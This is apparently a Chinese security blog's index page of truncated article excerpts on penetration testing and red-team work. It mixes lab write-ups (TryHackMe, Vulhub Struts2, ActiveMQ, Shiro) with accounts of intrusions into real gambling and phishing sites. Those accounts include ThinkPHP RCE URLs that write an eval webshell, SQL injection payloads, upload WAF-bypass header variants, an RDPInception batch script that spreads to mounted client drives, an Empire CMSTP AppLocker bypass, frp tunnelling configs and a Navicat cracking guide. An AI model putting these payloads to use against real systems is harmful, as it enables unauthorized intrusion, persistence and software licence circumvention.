红队攻击面相关讨论

前言 Navicat可能是Mysql必备的工具了,不过域还是建议具备一些网站开发经验才能更好的学习. 其次今天不发Thm靶场,水一下文章 发一些之前用的工具的破解教程(抱歉 介绍一下Navicat Navicat Premium 是一套可创建多个连接的数据库开发工具，让你从单一应用程序中同时连接 MySQL、Redis、MariaDB、MongoDB、SQL Server、Oracle、PostgreSQL 和 SQLite 。它与 GaussDB 、OceanBase 数据库及 Amazon RDS、Amazon Aurora、Amazon Redshift、Amazon ElastiCache、Microsoft Azure、Oracle Cloud、MongoDB Atlas、Redis Enterprise Cloud、阿里云、腾讯云和华为云等云数据库兼容。你可以快速轻松地创建、管理和维护数据库。 但是Navicat是需要破解的,不然只能用14天接下来教大家如何破解 破解激活教程 先在官方下载Navicat Navicat | 下载 Navicat Premium 14 天免费 Windows、macOS 和 Linux 的试用版 破解软件下载地址NavicatCracker.exe_免费高速下载|百度网盘-分享无限制 (baidu.com) 破解思路： 把破解软件放到Navicat文件夹中 让后关闭防火墙和网络 全…

前言 房间地址：https://tryhackme.com/room/hackpark 使用 Hydra 暴力破解网站登录，识别并使用公共漏洞，然后升级您在此 Windows 计算机上的权限！ 建站不一定需要linux(实际上市场上大部分都是linux,本次要打的靶场是用win建站,我们通过的网站漏洞打进Windows主机 看到是人入侵Windows 使用到了MSF，看经典好像是当年的永恒之蓝漏洞 实战 靶机地址：10.10.201.235 Hackpark的引入 小丑回魂里的,我虽然没看过这个电影,但是刷过片段,还行,这里只是一个小丑,其实我也是小丑 有个联系,预测可能有XSS注入, 这里有个登录,那就是爆破了 我们看下 第一题： 九头蛇爆破账号密码 让后看第二题 Hydra 确实有很多功能，并且有许多可用的“模块”（模块的一个示例是我们上面使用的http-post-form ）。 然而，这个工具不仅适用于暴力破解 HTTP 表单，还适用于其他协议，如 FTP、SSH、SMTP、SMB 等。 下面是一个迷你备忘单： 命令描述Hydra -P <单词列表> -v <ip> <协议>对您选择的协议进行暴力破解Hydra -v -V -u -L <用户名列表> -P <密码列表> -t 1…

0x00 漏洞简介Apache Struts2框架是一个用于开发Java EE网络应用程序的Web框架。Apache Struts于2020年12月08日披露 S2-061 Struts 远程代码执行漏洞(CVE-2020-17530)，在使用某些tag等情况下可能存在OGNL表达式注入漏洞，从而造成远程代码执行，风险极大。0x01 漏洞描述Struts2 会对某些标签属性(比如 `id`，其他属性有待寻找) 的属性值进行二次表达式解析，因此当这些标签属性中使用了 `%{x}` 且 `x` 的值用户可控时，用户再传入一个 `%{payload}` 即可造成OGNL表达式执行。S2-061是对S2-059沙盒进行的绕过。0x02 漏洞影响struts 2.0.0 - struts 2.5.250x03 漏洞复现一.环境搭建1.docker环境地址：https://github.com/vulhub/vulhub/tree/master/struts2/s2-061docker-compose up -d #启动docker环境2.访问目标地址 http://192.168.1.14:8080/index.action 二、漏洞利用1.DNSlog验证漏洞 POST /index.action HTTP/1.1Host: 192.168.1.14:8080Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows N…

一、信息收集拿到目标网站，可见是一个很常规的bc站。 先进行简单的信息收集，通过Wappalyzer插件可见php版本与windows serve这两个比较重要的信息 命令行nslookup+url查看ip,发现没有CDN 再到爱站上看看 嗯，柬埔寨可还行 知道ip地址后端口扫描一波（全端口扫描+服务探测。这个过程比较漫长，可以先干别的） 在扫描之余尝试3389连接远程桌面（因为开始已经看到是windows serve的服务器） 试了两次，猜测是修改端口了，或者是登录ip白名单？ 二、后台爆破回到web，反手在url后面加一个admin 后台出来了，这bc有点水啊，随手测了几个弱口令，无果 发现没有验证码校验，抓包爆破一波 通常找一些常规的弱口令进行爆破就够了 秒出密码：123456，我吐了，他们运维可能要被打死 三、寻找上传点这么简单就拿下了后台，我们当然不会满足。 大致浏览了一下后台的各个功能，寻找可以利用的地方，在系统管理处找到一处上传点 （有没有表哥发收款码过来，暴富的机会来了！） 随便写一个一句话，并将后缀改成.jpg并且抓包发送到Repeater查看 提示“不是真正的图片类型” ，在包内改成php后缀，提示非法文件类型 感觉是白名单+文件头校验，尝试图片马 尝试了几波，白名单限制得很死，没绕过去 顿时陷入了僵局，还是另外寻找突破口吧 四、峰回路转认真想了一下，它是Windows，而Windows的主流建站工具，宝塔，护卫神，phpstudy，upupw。之前看到它的php版本是5.2.17，正好想到前段时间爆出的phpstu…

0x00 前言 本文主要介绍一下MSF模块的下载、使用，以及当攻击机处于内网，而目标机也处于内网的解决方法。这里借助MS17-010漏洞来具体讲解一下，并没有新的知识点，可以为刚入门的新手抛砖引玉，提供一条解决问题的思路，同时也记录一下过程，加强记忆。 主要分为两个知识点，一是SMB漏洞的批量检测，二是内网穿透技术。 首先是环境的搭建，具体如下表所示： 主机IP备注 Kali 64位 192.168.232.134 攻击机 Windows XP 32位 192.168.232.128 安装了python2.6，下载有方程式利用工具包（主要为Windows目录下的工具） Window2008 R2 64位 10.50.2.62 靶机，存在MS17-010漏洞，并可以访问外网 0x01 SMB漏洞批量检测 1.扫描脚本的下载和加载 由于Metasploit还没有更新MS17-010检测的模块，所以要去exploit-db下载，并在MSF中加载。 root@kali:~# cd /usr/share/metasploit-framework/modules/auxiliary/scanner/smb root@kali:/usr/share/metasploit-framework/modules/auxiliary/scanner/smb# wget https://www.exploit-db.com/download/41891 -O smb_ms_17_010.rb …

一、STEP1->合理的网络规划与边界防护： 　　这里其实是一个老生常谈的问题，虽然Google号称消灭网络边界很多年了，至少2015年我就听说过类似的概念，但是目前国内甲方尤其是重资产甲方是无法消灭网络边界的，在短时内也看不到消灭网络边界的可能性。因而合理规划网络环境，做好边界安全防护依然是最最基础的事情。 　　（1）合理规划网络拓扑并不局限于Inside、Outside、DMZ等传统划分，而是根据实实在在的网络联通需求，合理规划自己的布局。 　　（2）合理划分区域，在区域合理规划FW、WAF、IPS、IDS、SOC、UTM、STIM、Agent（流量分析探针，用于APT攻击检测）等设备的部署，和互动互联。 　　（3）ACL配置：互相访问权限应该满足业务需求情况下，按照最小权限原则进行。所有的ACL配置以及相关变动需要保存历史记录，以便于审计。 　　（4）异地分公司通过VPN访问企业内部网络。且需要保证可靠的流量加密算法和足够强度的身份认证管理机制，例如双因子认证，动态认证等措施。 　　（5）云托管化的网络部署，应该在云上做虚拟的网路划分，对网络访问做满足需求下的最小权限分配。 　　（6）部署蜜罐、密网、沙箱的环境，诱导攻击者，发现攻击者、发现供给趋势，用于提供威胁情报、安全决策依据，并在一定程度上保护和隐藏机构内部信息网络。 二、STEP2->资产可信可控管理与漏洞管理： 　　对于很多依靠技术起家的互联网甲方目前的资产管理都是一团糟。何况大多数非IT行业的公司。所以对于资产的可信可控高效的组织管理是…

0x00 前言 本文演示了白名单AppLocker bypass的最常见和最熟悉的技术。我们知道，出于安全原因，系统管理员添加组策略来限制本地用户的应用程序执行。在上一篇文章中，我们讨论了“ Windows Applocker策略 - 初学者指南”，因为它们为应用程序控制策略定义了AppLocker规则，以及如何使用它们。但今天您将学习如何使用rundll文件绕过AppLocker策略。 DLL文件对于Window的操作系统非常重要，它还决定了自定义Windows的其他程序的运行。动态链接库（DLL）文件是一种文件类型，它向其他程序提供有关如何调用某些内容的指令。因此，多个软件甚至可以同时共享这样的DLL文件。尽管与.exe文件的格式相同,但DLL文件不能像.exe文件那样直接执行。dll文件扩展名可以是：.dll（动态链接库）、.ocx（ActiveX控件）、.cpl（控制面板）、.drv（设备驱动程序） 0x01 运行 当AppLocker使用时，DLL文件被分为多个部分。这使得DLL文件的运行变得简单快捷。每个部分都在运行时安装在主程序中。由于每个部分都不同且独立的，所以加载时间更快，并且仅在需要所述文件的功能时才完成。此功能还使升级更容易应用，而不影响其他部分。例如，您有一个字典程序，每个月都会添加新词，因此，对于这个程序，您所要做的就是更新它；而不需要为它安装一个完整的另一个程序。 1.优点 使用更少的资源 促进模块化架构 简化部署和安装 2.缺点 依赖DLL将升级到新版本 依赖DLL是固定的 依赖DLL将被早期版本…

默认情况下，AppLocker允许在文件夹中执行二进制文件，这是可以绕过它的主要原因。已经发现，这样的二进制文件可以很容易地用于绕过AppLocker和UAC。与Microsoft相关的二进制文件之一是CMSTP。CMSTP welcomes INF文件，因此通过INF进行开发是可能的。因此，我们将学习如何进行此类开发。 众所周知，CMSTP接受SCT文件，然后无提示地运行，因此我们将创建一个恶意的SCT文件以实现我们的目标。为此，我们将使用Empire PowerShell。有关Empire PowerShell的详细指南，请单击此处。 从Kali终端启动Empire框架，然后输入以下命令以创建恶意软件： listeners uselistener http set Host 192.168.1.109 execute 上面的命令将为您创建一个侦听器，然后键入back以从侦听器接口返回，并且创建SCT文件类型： usestager windows/launcher_sct set Listener HTTP execute 运行上述漏洞将创建SCT文件。我们将使用以下脚本在PowerShell中执行文件。在此脚本中，给出SCT文件的路径，并添加以下代码，如图所示： 从这里下载此脚本： ;cmstp.exe /s cmstp.inf [version] Signature=$chicago$ AdvancedINF=2.5 [DefaultInstall_SingleUser] UnRegister…

比赛信息 比赛名称：SHCTF-“山河”网络安全技能挑战赛 比赛平台：山河CTF 参赛对象：齐鲁工业大学、西安邮电大学、广东海洋大学、长春工程学院、郑州轻工业大学、河南大学、齐鲁师范学院、陕西邮电职业技术学院、陕西工业职业技术学院、商丘师范学院、咸阳师范学院 (排名不分先后)等十余所高校参与 比赛时间：2023-10-02 ~ 2023.10.29 协办单位：山东汉任信息安全技术有限公司，吉林谛听信息技术有限公司 题目详解 [WEEK1] ez_asm 拿到题目之后，从题目名字中的”asm”可以看出，这是一道考察汇编语言的题目，我们要有一定的汇编语言基础。下载下来可以看到给了我们一个txt文本，那么这里面一定是汇编块。打开之后确实是汇编块。 那么接下来就是 找到右上方的(x)用小手点击一下鼠标左键 哐哐一顿分析啦，详细的分解步骤就不多说了，这里涉及到汇编语言的知识，我简单解释一下它的逻辑： 这段汇编代码的功能是对一个字符串（flag）进行加密处理，然后输出加密后的结果。具体的操作步骤如下： 首先，定义一个变量var_4，用来存储字符串的索引，初始值为0。 然后，进入一个循环，对字符串的每个字符进行两次异或和减法操作，具体如下： 将var_4作为偏移量，从flag中取出一个字符，与16进制数0x1E异或，得到新的字符。 将新的字符存回flag中覆盖原来的字符。 再次从flag中取出同一个字符，减去16进制数0x0A，得…

0x00 写在故事之前 身一位渗透测试人员，比起 Client Side 的弱点，我更喜欢 Server Side 的攻击，能够直接控制服务器并获得权限操作 SHELL 才爽 。 当然一次完美的渗透出现任何形式的弱点都不可小视，在实际渗透时偶尔还是需要些 Client Side 弱点组合可以更完美的控制服务器，但是在寻找弱点时我本身还是先偏向于以可直接进入服务器的方式去寻找风险高、能长驱直入的弱点。随著 Facebook 在世界上越来越火、用户数量越来越多，一直以来都有想要尝试渗透目标的想法，恰好 Facebook 在 2012 年开始有了 Bug Bounty 奖金猎人的机制让我更加有兴趣渗透。 一般如由渗透的角度来说习惯性都会从收集资料、探测开始，首先界定出目标在网路上的 “范围” 有多大，姑且可以评估一下从何处比较有机会下手。例如: Google Hacking 能得到什么资料? 有几个 B 段的 IP ? C 段的 IP ? Whois? Reverse Whois? 有什么域名? 内部使用的域名? 接著做子域名的猜测、扫描 公司平常爱用什么样技术、设备? 在 Github, Pastebin 上是否有泄露的信息? …etc 当然 Bug Bounty 并不是让你无限制的攻击，将所遇到的范围与 Bug Bounty 所允许的范围做交集后才是你真正可以去尝试的目标。 一般来说大公司在渗透中比较容易出现的问题点这里例举几个例子来探讨： 对多数大公司而言，”网路边界” 是比较难顾及、容易出现问题的一块，当…

20231206085712722.doc 下载 doc文件 262.3K

一、漏洞描述 Apache Tomcat是由Apache软件基金会属下Jakarta项目开发的Servlet容器.默认情况下,Apache Tomcat会开启AJP连接器,方便与其他Web服务器通过AJP协议进行交互.但Apache Tomcat在AJP协议的实现上存在漏洞,导致攻击者可以通过发送恶意的AJP请求,可以读取或者包含Web应用根目录下的任意文件,如果配合文件上传任意格式文件，将可能导致任意代码执行(RCE).该漏洞利用AJP服务端口实现攻击,未开启AJP服务对外不受漏洞影响（tomcat默认将AJP服务开启并绑定至0.0.0.0/0）. 二、危险等级 高危 三、漏洞危害 攻击者可以读取 Tomcat所有 webapp目录下的任意文件。此外如果网站应用提供文件上传的功能，攻击者可以先向服务端上传一个内容含有恶意 JSP 脚本代码的文件（上传的文件本身可以是任意类型的文件，比如图片、纯文本文件等），然后利用 Ghostcat 漏洞进行文件包含，从而达到代码执行的危害 四、影响范围 Apache Tomcat 9.x < 9.0.31 Apache Tomcat 8.x < 8.5.51 Apache Tomcat 7.x < 7.0.100 Apache Tomcat 6.x 五、前提条件 对于处在漏洞影响版本范围内的 Tomcat 而言，若其开启 AJP Connector 且攻击者能够访问 AJP Connector 服务端口的情况下，即存在被 Ghostcat 漏洞利用的风险。注意 Tomc…

一、前言一般安全都属于运维部下面，和上家公司的运维总监聊过几次一些日常安全工作能不能融入到DevOps中，没多久因为各种原因离职。18年入职5月一家第三方支付公司，前半年在各种检查中度过，监管形势严峻加上大领导对安全的重视(主要还是监管)，所有部门19年的目标都和安全挂钩。由于支付公司需要面对各种监管机构的检查，部分安全做的比较完善，经过近一年对公司的熟悉发现应用安全方面比较薄弱。这部分业内比较好的解决方案就是SDL，和各厂商交流过之后决定自己照葫芦画瓢在公司一点一点推广。 上图为标准版的SDL,由于运维采用DevOps体系，测试也使用自动化进行功能测试，版本迭代周期比较快,安全人手不足加上对SDL的威胁建模等方法也一头雾水、如果把安全在加入整个流程会严重影响交付时间。在这种情况调研了一些业内的一些做法，决定把SDL精简化 。精简版SDL如下： . 二、精简版SDL落地实践安全培训SDL核心之一就是安全培训，所以在安全培训上我们做了安全编码、安全意识、安全知识库、安全SDK 安全编码：我们在网上找了一些java安全编码规范、产品安全设计及开发安全规范结合公司实际业务出了一版。 因为各种监管机构对培训都有要求，借此推了一下安全培训，定期对开发和新员工入职的培训。 安全意识：公司有企业微信公众号，大部分员工都关注了，在公众号推广了一波。 宣传完之后答题，答题满分送小礼品 因为人手不足，而功能测试和安全测试本质上有很多相通的地方，测试部门也比较配合，针对测试人员做了一些安全测试相关的培训，但是效果并不是太理想。 安全知识库：在漏洞修…

0x00 漏洞前言 Apache ActiveMQ是美国阿帕奇（Apache）软件基金会所研发的一套开源的消息中间件，它支持Java消息服务，集群，Spring Framework等。Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞，该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务（JMS）ObjectMessage对象利用该漏洞执行任意代码。 0x01 漏洞环境 1.在ubuntu16.04下安装docker/docker-compose: # 安装pip curl -s https://bootstrap.pypa.io/get-pip.py | python3 # 安装最新版docker curl -s https://get.docker.com/ | sh # 启动docker服务 service docker start # 安装compose pip install docker-compose # 下载项目 wget https://github.com/vulhub/vulhub/archive/master.zip -O vulhub-master.zip unzip vulhub-master.zip cd vulhub-master # 进入某一个漏洞/环境的目录 cd activemq/CVE-2015-5254/ # 自动化编译环境 docker-compose build 2.运行漏洞环境： docke…

0x00 前言随着菠菜类违法站点的肆虐，让无数人妻离子散。为此，献上一份微薄之力，希望能给“有关部门”提供一些帮助。今天给大家表演的是收割BC天恒盛达。 0x01 程序介绍程序采用PHP5.4 + MySQL 程序结构如下 基本上目前做此类违法站点的不法分子，除了外包以外就是天恒、大发几套程序模改的。暂时，这边由于技术水平上面的问题，只能够发出天恒的。版本可能有点老。但是，一大部分还是用的。经某位不愿透露自己姓名的网友4月中旬实测，大约70%的存在这些问题，而使用这套程序的违法站点经过半个小时的采集大约在5000~20000左右。 0x02 漏洞详情1、money - SQL注入 web\wjaction\default\PayOnlineBack.class.php 继续跟进money，此处为GET获取，接着看条件 条件展示，第一个为Key验证，这个在配置文件里。如果Key错误则表示所有订单都无法生效。也就是说Key肯定是在URL请求内，这个验证即可绕过。 继续看条件，这里是生成一个MD5值进行校验。但是这种校验是有缺陷的，此处并未把key的值带入进去。所以我们直接提交的时候，把$tno.$payno.$money都设为空。那么我们将获取$md5key的MD5值。因为$sign在URL中能展示出来。解密后，我们再按照他的验证机制就可以写脚本，进行注入了。 往下继续看，交易号随机来就行了。 继续看，最后一个验证。这里的用户名肯定是真实的，所以这里的验证就算是废掉了 接下来，根据前面的分析，就可…

密码学简介密码学（Cryptography）一般可分为古典密码学和现代密码学。 其中，古典密码学，作为一种实用性艺术存在，其编码和破译通常依赖于设计者和敌手的创造力与技巧，并没有对密码学原件进行清晰的定义。其主要包含以下几个方面 单表替换加密多表替换加密奇奇怪怪的加密方式而现代密码学则起源于 20 世纪末出现的大量相关理论，这些理论使得现代密码学成为了一种可以系统而严格地学习的科学。现代密码学又可以简单的分为以下几个方面 对称密码，以 DES，AES，RC4 为代表。非对称密码，以 RSA，椭圆曲线加密为代表。Hash，以 MD5，SHA1，SHA512 等为代表。数字签名，以 RSA 签名，ElGamal 签名，DSA 签名为代表。其加密方式主要有两种方式 块加密流加密一般来说，密码设计者的基本想法是确保密码框架的 保密性完整性可用性不可否认性其中，前三者又称为 CIA 三元组。 而对于密码破解者来说，一般都是要想办法识别密码算法，然后利用暴力破解方法或者密码框架的漏洞进行破解。当然，也有可能是处于希望构造虚假的哈希值或者签名来绕过相应的检测。 一般来说，我们都会假设攻击者知道要攻破的密码体制，一般来说会有如下几种攻击类型， 攻击类型说明适用场景唯密文攻击攻击者只拥有密文古典密码已知明文攻击知道明文和对应的密文古典密码，对称密码，非对称密码选择明文攻击能够对选择一些明文加密后获得其相应的密文对称密码，非对称密码选择密文攻击能够对选择一些密文解密后获得明文非对称密码这里推荐一些资料 可汗学院公开课深入浅出密码学——常用加密技术原理与应用参…

0x00 前言上面给了个任务，一看，地图系统，懵逼了，这种的系统一般就是调个百度地图的api，无交互，想要挖洞简直难上加难... 一波信息收集后，发现该主站一个功能可以跳转到该单位的微信公众号，且存在上传点，因此有了本文。 0x01 FUZZ有了上传点，废话不多说先看看后缀能不能过 先传一个图片，更改后缀尝试上传 直接没了，难道是白名单吗，尝试随意后缀上传 发现可以上传，可能是存在waf？ 直接传内容为一句话，看看会不会被拦截 结果没被拦截，应该是代码对后缀做了一些操作， 接下来就是一顿fuzz，搞了半天发现后缀名这边是过不去了，换行大法直接报错 拿出之前过安全狗的方法试了一下，溢出Content-Disposition:字段， 竟然就这么成功了... 0x02 又一个问题现在传是传上去了，但是没有返回完整路径，也不知道传哪儿去了，这咋整 扫当前目录啥也没扫到 然后扫了波一级目录，发现存在upload目录， 尝试拼接，成功getshell 0x03 总结1.通过目标站点的公众号处存在一处附件上传，那么可能存在任意文件上传漏洞2.通过bp的intruder功能对后缀名进行批量fuzz，发现都被拦截，这里又测试上传test.aaa，内容为this is a test,发现可以上传，那么猜测目标站点存在WAF,拦截了后缀名3.接着测试上传的内容为一句话木马，可成功上传，并没有对内容进行拦截3.通过Content-Disposition:拦截字段填充可绕过waf成功上传，并返回上传的文件名，但是并不知道上传的路径如:Co…

前言在内网渗透时，一个WebShell或CobaltStrike、Metasploit上线等，只是开端，更多是要内网横向移动，扩大战果，打到核心区域。但后渗透的前提是需要搭建一条通向内网的“专属通道”，才能进一步攻击。可实战中因为网络环境不同，所利用的方式就不同。 以下为自我总结“实战中内网穿透的打法”思维导图： 目标出网（socks代理）这是实战中最愿意碰到的网络环境，目标机可以正常访问互联网，可直接在目标机挂socks代理或CobaltStrike上线，打通目标的内网通道。 Frp（socks5） Frp服务端配置文件： 1 | [common] 2 | bind_port = 8080Frp客户端配置文件： 1 | [common] 2 | server_addr = xx.xx.xx.xx 3 | server_port = 8080 4 | #服务端口使用Web常见端口 5 | 6 | [socks5] 7 | type = tcp 8 | remote_port = 8088 9 | plugin = socks5 10 | use_encryption = true 11 | use_compression = true 12 | #socks5口令 13 | #plugin_user = SuperMan 14 | #plugin_passwd = XpO2McWe6nj3此处添加了加密压缩这两个功能，默认是不开启的，根据作者介绍，压缩算法使用的是 snappy。 use_encryption = true 启用加密…

近期在项目中管理员在rdp挂载之后搞掉了管理员，想着有时间就整理下针对rdp的利用方法。 针对挂盘的利用方法复制文件这个不多说，可以根据的不同的挂盘来决定是拖文件还是放启动项。有一些自动文件监控和拷贝的应用,如：https://github.com/cnucky/DarkGuardianDarkGuardian是一款用于监控RDP登录后TSCLIENT(挂盘)的工具,工具后台运行时可自动获取挂盘的文件列表,下载指定文件,拷贝木马文件到挂载硬盘的启动项等功能 RDPInception这种方法相对鸡肋一点，原理就是利用bat脚本放到server启动项/winlogon执行脚本处，等待管理员挂盘后重启执行命令。 @echo off echo Updating Windows ... @echo off timeout 1 >nul 2>&1 mkdir \\tsclient\c\temp >nul 2>&1 mkdir C:\temp >nul 2>&1 copy run.bat C:\temp >nul 2>&1 copy run.bat \\tsclient\c\temp >nul 2>&1 del /q %TEMP%\temp_00.txt >nul 2>&1 set dirs=dir /a:d /b /s C:\users\*Startup* set dirs2=dir /a:d /b /s \\tscl…

0x00 漏洞描述Apache Shiro是一款开源安全框架，提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用，同时也能提供健壮的安全性。Apache Shiro 1.2.4及以前版本中，加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie，触发Java反序列化漏洞，进而在目标机器上执行任意命令只要rememberMe的AES加密密钥泄露，无论shiro是什么版本都会导致反序列化漏洞。0x01 影响版本Apache Shiro <= 1.2.40x02 漏洞原理Apache Shiro框架提供了记住我的功能（RememberMe），关闭了浏览器下次再打开时还是能记住你是谁，下次访问时无需再登录即可访问。用户登陆成功后会生成经过加密并编码的cookie。Apache Shiro 1.2.4及以前版本中，Apache Shiro默认使用了CookieRememberMeManager，其处理cookie的流程是：得到rememberMe的cookie值 > Base64解码–>AES解密–>反序列化。然而AES的密钥是硬编码的，就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞在服务端接收cookie值时，按照如下步骤来解析处理： 1、检索RememberMe cookie 的值 2、Base 64解码 3、使用AES解密(加密密钥硬编码) 4、进行反序列化操作（未作过滤处理） 但是，AES加密的密钥Key被硬编码在代码里，意味…

原始默认状态： ——WebKitFormBoundary2smpsxFB3D0KbA7D Content-Disposition: form-data; name=”filepath”; filename=”backlion.asp” Content-Type: text/html 突破0，文件名前缀加[0x09]绕过： ——WebKitFormBoundary2smpsxFB3D0KbA7D Content-Disposition: form-data; name=”filepath”; filename=”[0x09]backlion.asp” Content-Type: text/html 突破1，文件名去掉双引号绕过： ——WebKitFormBoundary2smpsxFB3D0KbA7D Content-Disposition: form-data; name=”filepath”; filename=backlion.asp Content-Type: text/html 突破2，添加一个filename1的文件名参数，并赋值绕过： ——WebKitFormBoundary2smpsxFB3D0KbA7D Content-Disposition: form-data; name=”filepath”; filename=”backlion.asp”;filename1=”test.jpg” Content-Type: text/html 突破3， form变量改成f+orm组合绕过： ——…

一个学长前几天不幸在钓鱼网站中招被骗走一些资金，在联系有关部门前找到了我看看能不能获取到一些有用的信息以便于有关部门行动 在对网站进行初步信息收集后发现网站使用ThinkPHP 5.0.7框架，直接找到ThinkPHP对应版本的Exp进行尝试： http://www.hu*****.***/index.php?s=/index/\think\app/invokefunction&function=phpinfo&vars[0]=1 //执行phpinfo 成功弹出phpinfo，ThinkPHP的RCE漏洞没有修复，并且通过phpinfo可以看出服务器使用宝塔搭建，运行Windows系统，本想着接下来的事情就非常简单了，但是当我写Shell时遇到了困难： http://www.hu*****.***/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=ye.php&vars[1][]=<?php eval($_POST['cmd']);?> 文件被成功写入，但是却直接输出在了页面中，查看源代码发现< >被转义为了HTML实体编码： 在尝试利用base64编码后再写入，发现依然被转义，直接命令执行试一试： http://www.hu*****.***/index.php?s=/ind…

一、文件/文件夹管理 ls #列出当前目录文件（不包括隐含文件） ls -a #列出当前目录文件（包括隐含文件） ls -l #列出当前目录下文件的详细信息 ls -al #列出当前详细目录文件和隐藏的文件信息 cd .. #回当前目录的上一级目录 cd ~ #回当前用户的宿主目录 cd 目录名 #改变当前目录 pwd #查看当前目录路径 mkdir test #创建一个空目录 rmdir test #删除一个空目录 rm -rf dir #删除所有含有目录和文件 rm filename #删除一个文件或多个文件 mv /lib/usr /opt/ #将文件移动相对路经下的文件到…

0x00 信息搜集朋友给了我一个站，算一个比较大的bc，主站看了一下，没有入口，就换了他的一个推广平台 然后首先大致扫了一下目录，希望可以看见一些有用的东西。 这个时候我可以推荐大家一个接口，可以快速大致看看他重要的文件 https://scan.top15.cn/web/infoleak 例如探针，网站源码是否打包，很明显我没有扫出来，然后给大家看看扫描结果。 config.inc.php根据经验看应该是数据库的配置文件，但是大小为0B,试探性的访问一下，果然什么都没有 upload访问就是403，但是根据经验还是会再去扫一下它，说不定是什么fck编辑器呢，也很遗憾，啥子都没有扫到。 /index.php/login/ ，大小只有2kb，也根本不是后台，有点失落。 端口的话也只有这一个web资产，只好看一下他的网站功能了。 然后点击了一下查询，希望可以在这里找找注入。 0x01 后台注入 果然，有注入，剩下的就是找后台了。 查看当前数据库，and (extractvalue(1,concat(0x7e,(select database()),0x7e)))-- 这里记一下踩坑，account=1') and (extractvalue(1,concat(0x7e,(select database()),0x7e)))--(' 这是完整的payload，最开始我的payload为account=1') and (extractvalue(1,concat(0x7e,(select database()),0x7e)))-…

日常流程简要说明入口权限 => 内网搜集/探测 => 免杀提权[非必须] => 抓取登录凭证 => 跨平台横向 => 入口维持 => 数据回传 => 定期权限维护 0x01 入口权限获取 [ 前期侦察，搜集阶段本身就不存在太多可防御的点，非防御重心 ]1.绕CDN找出目标所有真实ip段(1).通过全国多个PING，查看IP地址是否唯一来判断是否存在CDNhttp://ping.chinaz.com/https://tools.ipip.net/ping.phphttps://www.17ce.com/https://www.cdnplanet.com/tools/cdnfinder/(2).通过之前的DNS绑定历史记录来查找真实IP地址https://x.threatbook.cn/https://viewdns.info/https://www.ip138.com/http://toolbar.netcraft.com/site_report?url=https://securitytrails.com/(3).通过获取多个子域名，并批量对多个子域名进行ping，可判断该子域名的IP段就是真实IP段（主站用了CND，而子域名分站不用Cdn解析）Layer子域名挖掘机/GoogleHackinghttps://phpinfo.me/domain/http://tool.chinaz.com/subdomain/https://github.com/lijiejie/subDomainsBrute(…